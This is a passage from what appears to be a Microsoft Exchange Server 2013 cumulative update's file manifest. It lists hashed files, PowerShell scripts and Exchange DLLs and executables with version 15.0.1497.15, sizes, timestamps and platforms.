\nFilf1dbefccbfa368491a69955663586af4| Not applicable| 234,623| 10-Sep-2020| 08:09| Not applicable \nFilf21ccdcd3e87189b3373cbe88465bbed| Not applicable| 160,091| 10-Sep-2020| 08:08| Not applicable \nFilf257fa6642fbb757e3f26de753df4489| Not applicable| 322,187| 10-Sep-2020| 08:09| Not applicable \nFilf29a31a400ab7bfd670be114c615e00e| Not applicable| 440,018| 10-Sep-2020| 08:07| Not applicable \nFilf3015d007a6f5f56a11032dcd1ce8969| Not applicable| 1,875| 10-Sep-2020| 08:10| Not applicable \nFilf312b9f00ef669d78efe9b0d80f99896| Not applicable| 209,647| 10-Sep-2020| 08:10| Not applicable \nFilf31637de0f0a1e59a079df18e7f11f70| Not applicable| 532,038| 10-Sep-2020| 08:09| Not applicable \nFilf423a2f8e32497160710c8152115c908| Not applicable| 739| 10-Sep-2020| 08:10| Not applicable \nFilf4f7477b721b363112253d772077f40a| Not applicable| 44,908| 10-Sep-2020| 08:10| Not applicable \nFilf57cc0e30babe3fc1f5dcf14ffe60ce6| Not applicable| 569,467| 10-Sep-2020| 08:09| Not applicable \nFilf588408b53c88d5458d0bdfcabd56663| Not applicable| 162,184| 10-Sep-2020| 08:08| Not applicable \nFilf5c3373f3ffd93654bd1b1876513b75f| Not applicable| 63,356| 10-Sep-2020| 08:08| Not applicable \nFilf6d8842a14339881592611f23bb7b252| Not applicable| 11,215| 10-Sep-2020| 08:11| Not applicable \nFilf703fe4b5a67deaaa43a5f6ec9473805| Not applicable| 510,613| 10-Sep-2020| 08:10| Not applicable \nFilf7b4e504538e95c386061696b9d45120| Not applicable| 487,727| 10-Sep-2020| 08:11| Not applicable \nFilf7ecfde79d2a28e873992ce54d255fa4| Not applicable| 12,496| 10-Sep-2020| 08:10| Not applicable \nFilf8694f2cec5c365c0ef11b2f23dec843| Not applicable| 348,665| 10-Sep-2020| 08:11| Not applicable \nFilf90a123a3d43f3927c5318df051b9542| Not applicable| 492,011| 10-Sep-2020| 08:08| Not applicable \nFilf90f4fab546e82b6ef9b90297aef9ad7| Not applicable| 449,767| 10-Sep-2020| 08:08| Not applicable \nFilf992eef20268ccc0eb06557927ff1afd| Not applicable| 1,226| 10-Sep-2020| 08:10| Not applicable \nFilf9a6877dcf00a67a311f48dad50b7e9b| Not applicable| 62,482| 10-Sep-2020| 08:08| Not applicable \nFilf9b49c84aebc070c43e273a673e1cf99| Not applicable| 14,419| 10-Sep-2020| 08:03| Not applicable \nFilf9e067ad79a7547e26462a712cbd2234| Not applicable| 166,529| 10-Sep-2020| 08:08| Not applicable \nFilf9f6edd39dceaf9e49f9eb33efd6947e| Not applicable| 13,469| 10-Sep-2020| 08:10| Not applicable \nFilfac323bdf8297e52cb9758bc0f107bdf| Not applicable| 272,915| 10-Sep-2020| 08:09| Not applicable \nFilfc185af7dea156a27d3ffbbb82d11e73| Not applicable| 1,874| 10-Sep-2020| 08:10| Not applicable \nFilfca646dd1df179d1706cdf713ccc1069| Not applicable| 11,309| 10-Sep-2020| 08:10| Not applicable \nFilfd686744556fc950cd80295cb80aff43| Not applicable| 249,760| 10-Sep-2020| 08:08| Not applicable \nFilfe0ef3ae7100cf23dd43d3efa4f0a0e9| Not applicable| 433,228| 10-Sep-2020| 08:08| Not applicable \nFilfe13d9d3d88bb5b431d4a796b8541c66| Not applicable| 63,672| 10-Sep-2020| 08:08| Not applicable \nFilfe1f533df46bf985ea2b2ab30e5d6a35| Not applicable| 161,408| 10-Sep-2020| 08:08| Not applicable \nFilfefeffa72c0a131333c1a98e9bb695c0| Not applicable| 45,162| 10-Sep-2020| 08:10| Not applicable \nFilff7006991aa221e3c40687aae0081106| Not applicable| 3,184| 10-Sep-2020| 08:10| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,303| 04-Apr-2021| 10:33| Not applicable \nGetucpool.ps1| Not applicable| 19,855| 04-Apr-2021| 10:33| Not applicable \nGetvalidengines.ps1| Not applicable| 13,338| 04-Apr-2021| 10:33| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,106| 04-Apr-2021| 10:33| Not applicable \nImportedgeconfig.ps1| Not applicable| 77,328| 04-Apr-2021| 10:33| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 36,522| 04-Apr-2021| 10:33| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,898| 04-Apr-2021| 10:33| Not applicable \nLpversioning.xml| Not applicable| 20,426| 04-Apr-2021| 10:39| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 45,408| 04-Apr-2021| 10:33| Not applicable \nMicrosoft.ceres.datalossprevention.dll.90160000_1164_0000_1000_1000000ff1ce| 16.0.1497.15| 873,992| 04-Apr-2021| 10:32| Not applicable \nMicrosoft.dkm.proxy.dll| 15.0.1497.15| 32,720| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.addressbook.service.dll| 15.0.1497.15| 218,608| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.airsync.dll1| 15.0.1497.15| 1,676,264| 04-Apr-2021| 10:39| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.0.1497.15| 59,368| 04-Apr-2021| 10:39| x86 \nMicrosoft.exchange.anchorservice.dll| 15.0.1497.15| 137,672| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.0.1497.15| 27,624| 04-Apr-2021| 10:38| x86 \nMicrosoft.exchange.approval.applications.dll| 15.0.1497.15| 53,200| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.assistants.dll| 15.0.1497.15| 339,400| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.0.1497.15| 70,616| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.authadminservicelet.dll| 15.0.1497.15| 36,320| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.0.1497.15| 15,832| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.autodiscover.dll| 15.0.1497.15| 360,384| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.autodiscoverv2.dll| 15.0.1497.15| 31,688| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.batchservice.dll| 15.0.1497.15| 33,208| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.0.1497.15| 26,592| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.0.1497.15| 23,512| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.clients.common.dll| 15.0.1497.15| 158,144| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.clients.owa.dll| 15.0.1497.15| 3,030,448| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.0.1497.15| 2,269,624| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.clients.security.dll| 15.0.1497.15| 156,088| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.0.1497.15| 22,456| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.0.1497.15| 2,698,680| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.0.1497.15| 107,952| 04-Apr-2021| 10:35| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.0.1497.15| 287,696| 04-Apr-2021| 10:35| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.0.1497.15| 462,800| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.0.1497.15| 55,752| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.common.dll| 15.0.1497.15| 157,632| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.common.inference.dll| 15.0.1497.15| 39,376| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.compliance.dll| 15.0.1497.15| 85,456| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.0.1497.15| 173,024| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.0.1497.15| 74,720| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.0.1497.15| 25,568| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.compression.dll| 15.0.1497.15| 17,872| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 15.0.1497.15| 37,856| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.configuration.core.dll| 15.0.1497.15| 111,080| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.0.1497.15| 53,736| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.0.1497.15| 24,040| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.configuration.failfast.dll| 15.0.1497.15| 55,272| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.configuration.objectmodel.dll| 15.0.1497.15| 1,455,056| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.0.1497.15| 71,632| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.0.1497.15| 21,456| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.connections.common.dll| 15.0.1497.15| 77,264| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.connections.eas.dll| 15.0.1497.15| 235,984| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.connections.imap.dll| 15.0.1497.15| 115,152| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.connections.pop.dll| 15.0.1497.15| 74,704| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.core.strings.dll| 15.0.1497.15| 599,504| 04-Apr-2021| 10:38| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 15.0.1497.15| 1,271,280| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.data.directory.dll| 15.0.1497.15| 6,639,120| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.data.dll| 15.0.1497.15| 1,378,800| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.0.1497.15| 314,344| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.data.ha.dll| 15.0.1497.15| 82,424| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.data.imageanalysis.dll| 15.0.1497.15| 108,024| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.data.mapi.dll| 15.0.1497.15| 175,096| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.data.metering.contracts.dll| 15.0.1497.15| 31,232| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.data.metering.dll| 15.0.1497.15| 99,312| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.data.providers.dll| 15.0.1497.15| 141,296| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.0.1497.15| 143,856| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.data.storage.dll| 15.0.1497.15| 8,145,928| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.0.1497.15| 36,344| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.datacenterstrings.dll| 15.0.1497.15| 75,232| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.0.1497.15| 22,992| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.diagnostics.dll| 15.0.1497.15| 1,934,800| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.0.1497.15| 23,992| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.diagnostics.service.common.dll| 15.0.1497.15| 321,968| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.0.1497.15| 134,608| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.0.1497.15| 127,416| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.0.1497.15| 50,664| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.directory.topologyservice.exe| 15.0.1497.15| 192,976| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.dxstore.dll| 15.0.1497.15| 279,504| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.0.1497.15| 20,920| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.0.1497.15| 22,008| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.0.1497.15| 153,568| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.0.1497.15| 225,264| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.edgesyncsvc.exe| 15.0.1497.15| 98,272| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.0.1497.15| 1,126,368| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.0.1497.15| 1,126,368| 04-Apr-2021| 10:35| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 16,514| 04-Apr-2021| 11:23| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 67,578| 04-Apr-2021| 11:08| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.0.1497.15| 295,904| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.0.1497.15| 56,304| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.0.1497.15| 208,352| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.entities.common.dll| 15.0.1497.15| 155,096| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.0.1497.15| 137,184| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.0.1497.15| 35,296| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.entities.people.dll| 15.0.1497.15| 37,360| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.0.1497.15| 16,312| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.eserepl.dll| 15.0.1497.15| 118,704| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.0.1497.15| 37,368| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.0.1497.15| 560,112| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.0.1497.15| 15,832| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.0.1497.15| 76,792| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.0.1497.15| 571,832| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.0.1497.15| 42,928| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.helpprovider.dll| 15.0.1497.15| 39,432| 04-Apr-2021| 10:38| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.0.1497.15| 31,168| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.0.1497.15| 95,672| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.0.1497.15| 35,256| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.0.1497.15| 17,840| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.0.1497.15| 21,440| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.0.1497.15| 35,264| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.0.1497.15| 63,928| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.0.1497.15| 27,072| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.httputilities.dll| 15.0.1497.15| 20,920| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.0.1497.15| 1,033,688| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.imap4.exe| 15.0.1497.15| 230,352| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.0.1497.15| 230,352| 04-Apr-2021| 10:35| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.0.1497.15| 25,040| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.0.1497.15| 25,040| 04-Apr-2021| 10:35| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.0.1497.15| 71,688| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.inference.mdbcommon.dll| 15.0.1497.15| 75,768| 04-Apr-2021| 10:38| x86 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.0.1497.15| 93,704| 04-Apr-2021| 10:38| x86 \nMicrosoft.exchange.inference.pipeline.dll| 15.0.1497.15| 21,512| 04-Apr-2021| 10:38| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.0.1497.15| 19,464| 04-Apr-2021| 10:38| x86 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.0.1497.15| 35,320| 04-Apr-2021| 10:38| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.0.1497.15| 1,662,456| 04-Apr-2021| 10:38| x86 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.0.1497.15| 164,352| 04-Apr-2021| 10:38| x86 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.0.1497.15| 84,984| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.live.domainservices.dll| 15.0.1497.15| 122,336| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.0.1497.15| 20,408| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.0.1497.15| 18,888| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.loguploader.dll| 15.0.1497.15| 159,696| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.0.1497.15| 61,392| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.0.1497.15| 346,032| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.0.1497.15| 43,448| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.mailboxloadbalanceclient.dll| 15.0.1497.15| 24,496| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.0.1497.15| 1,523,640| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.0.1497.15| 639,416| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.0.1497.15| 106,416| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.0.1497.15| 61,880| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.0.1497.15| 91,576| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.0.1497.15| 42,424| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.0.1497.15| 121,776| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.0.1497.15| 148,408| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.0.1497.15| 82,368| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.0.1497.15| 72,632| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.0.1497.15| 120,248| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.mailboxreplicationservice.upgrade14to15.dll| 15.0.1497.15| 276,408| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.0.1497.15| 140,256| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.0.1497.15| 517,088| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.0.1497.15| 191,960| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.0.1497.15| 38,896| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.0.1497.15| 6,405,560| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.0.1497.15| 286,128| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.0.1497.15| 96,752| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.management.deployment.dll| 15.0.1497.15| 614,896| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.0.1497.15| 70,064| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.management.dll| 15.0.1497.15| 19,301,880| 04-Apr-2021| 10:36| x64 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.0.1497.15| 60,832| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.management.mobility.dll| 15.0.1497.15| 306,680| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.management.powershell.support.dll| 15.0.1497.15| 229,368| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.0.1497.15| 47,096| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.0.1497.15| 6,657,528| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.management.recipient.dll| 15.0.1497.15| 854,496| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.management.reportingwebservice.dll| 15.0.1497.15| 146,336| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.management.snapin.esm.dll| 15.0.1497.15| 73,136| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.0.1497.15| 1,273,760| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.management.transport.dll| 15.0.1497.15| 764,400| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.managementgui.dll| 15.0.1497.15| 5,352,376| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.mapihttpclient.dll| 15.0.1497.15| 115,152| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.0.1497.15| 192,488| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.0.1497.15| 78,824| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.0.1497.15| 66,016| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.0.1497.15| 28,656| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.0.1497.15| 173,048| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.0.1497.15| 25,560| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.0.1497.15| 153,048| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.0.1497.15| 309,720| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.0.1497.15| 34,288| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.0.1497.15| 98,808| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.migration.dll| 15.0.1497.15| 962,032| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.migrationmonitor.dll| 15.0.1497.15| 144,856| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.mobiledriver.dll| 15.0.1497.15| 139,248| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.0.1497.15| 3,922,936| 04-Apr-2021| 10:38| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.0.1497.15| 20,472| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.net.dll| 15.0.1497.15| 4,034,512| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.notifications.broker.exe| 15.0.1497.15| 173,008| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.notifications.brokerapi.dll| 15.0.1497.15| 56,240| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.0.1497.15| 20,968| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.0.1497.15| 73,224| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.0.1497.15| 15,352| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.pop3.exe| 15.0.1497.15| 92,600| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.0.1497.15| 92,600| 04-Apr-2021| 10:35| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.0.1497.15| 25,040| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.0.1497.15| 25,040| 04-Apr-2021| 10:35| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.0.1497.15| 209,864| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.0.1497.15| 209,864| 04-Apr-2021| 10:35| Not applicable \nMicrosoft.exchange.powersharp.management.dll| 15.0.1497.15| 4,177,912| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.0.1497.15| 261,544| 04-Apr-2021| 10:35| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.0.1497.15| 41,392| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.0.1497.15| 29,176| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.0.1497.15| 134,104| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.0.1497.15| 406,488| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.provisioningagent.dll| 15.0.1497.15| 228,344| 04-Apr-2021| 10:36| x64 \nMicrosoft.exchange.provisioningservicelet.dll| 15.0.1497.15| 80,888| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.pushnotifications.dll| 15.0.1497.15| 105,400| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.0.1497.15| 407,992| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.0.1497.15| 72,632| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.rpc.dll| 15.0.1497.15| 1,466,832| 04-Apr-2021| 10:37| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.0.1497.15| 150,504| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.0.1497.15| 62,440| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.0.1497.15| 483,824| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.0.1497.15| 149,480| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.0.1497.15| 733,648| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.0.1497.15| 207,848| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.0.1497.15| 31,688| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.rpchttpmodules.dll| 15.0.1497.15| 41,464| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.0.1497.15| 51,192| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.rules.common.dll| 15.0.1497.15| 137,160| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.0.1497.15| 20,464| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.search.core.dll| 15.0.1497.15| 290,232| 04-Apr-2021| 10:39| x86 \nMicrosoft.exchange.search.engine.dll| 15.0.1497.15| 97,232| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.search.fast.dll| 15.0.1497.15| 329,168| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.search.mdb.dll| 15.0.1497.15| 175,040| 04-Apr-2021| 10:39| x86 \nMicrosoft.exchange.search.query.dll| 15.0.1497.15| 95,184| 04-Apr-2021| 10:38| x86 \nMicrosoft.exchange.search.service.exe| 15.0.1497.15| 